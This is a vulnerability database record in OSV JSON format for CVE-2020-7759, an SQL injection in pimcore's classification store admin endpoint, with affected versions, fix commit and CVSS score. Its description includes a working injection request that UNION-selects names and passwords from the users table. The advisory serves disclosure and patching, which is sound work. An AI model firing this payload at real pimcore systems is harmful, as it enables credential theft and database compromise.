{"id":"CVE-2020-7759","details":"The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{\"keyId\"%3a\"''\",\"groupId\"%3a\"'asd'))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,'',11,12,'',14+from+users)+--+\"}]","aliases":["GHSA-8jmh-c6vr-pmvm","SNYK-PHP-PIMCOREPIMCORE-1017405"],"modified":"2026-08-07T19:48:29.135447Z","published":"2020-10-30T11:15:12.523Z","references":[{"type":"ADVISORY","url":"https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1017405"},{"type":"FIX","url":"https://github.com/pimcore/pimcore/pull/7315"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/pimcore/pimcore","events":[{"introduced":"12fa6853dd8ebaac781610af9d475fd5724ee487"},{"fixed":"9da77eb34a4d59aadbc3adbc5f3e9f819b6cbe11"}],"database_specific":{"cpe":"cpe:2.3:a:pimcore:pimcore:*:*:*:*:*:*:*:*","extracted_events":[{"introduced":"6.7.2"},{"fixed":"6.8.3"}],"source":"CPE_RANGE"}}],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2020-7759.json"}}],"schema_version":"1.8.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}]}